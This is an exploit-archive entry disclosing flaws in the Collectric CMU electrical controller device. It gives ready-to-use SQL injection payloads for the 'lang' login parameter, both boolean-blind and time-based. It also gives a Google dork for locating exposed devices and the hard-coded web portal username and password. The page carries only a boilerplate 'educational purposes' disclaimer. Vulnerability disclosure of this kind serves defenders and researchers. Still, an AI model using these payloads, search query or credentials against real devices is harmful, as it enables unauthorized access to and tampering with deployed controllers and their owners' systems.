Exploits / Vulnerability Discovered : 2018-09-21 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Collectric cmu 1.0 lang hardcoded credentials / sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Collectric CMU 1.0 - 'lang' SQL injection
# Google Dork: "Inloggning Collectric CMU"
# Discoverer: Simon Brannstrom
# Date: 2018-09-15
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# CVE: N/A
# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters,
# camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface.
# More vulnerabilities exists, see my other vulnerability reports.
# Parameter: lang (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in
# Exploit Title: Collectric CMU - Hard-coded SSH/MySQL/Web credentials.
# Discoverer: Simon Brannstrom
# Date: 09/15/2018
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters, camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface.
More vulnerabilities exists, see my other vulnerability reports.
---
Web Portal hard-coded credentials:
username: sysadmin
password: zoogin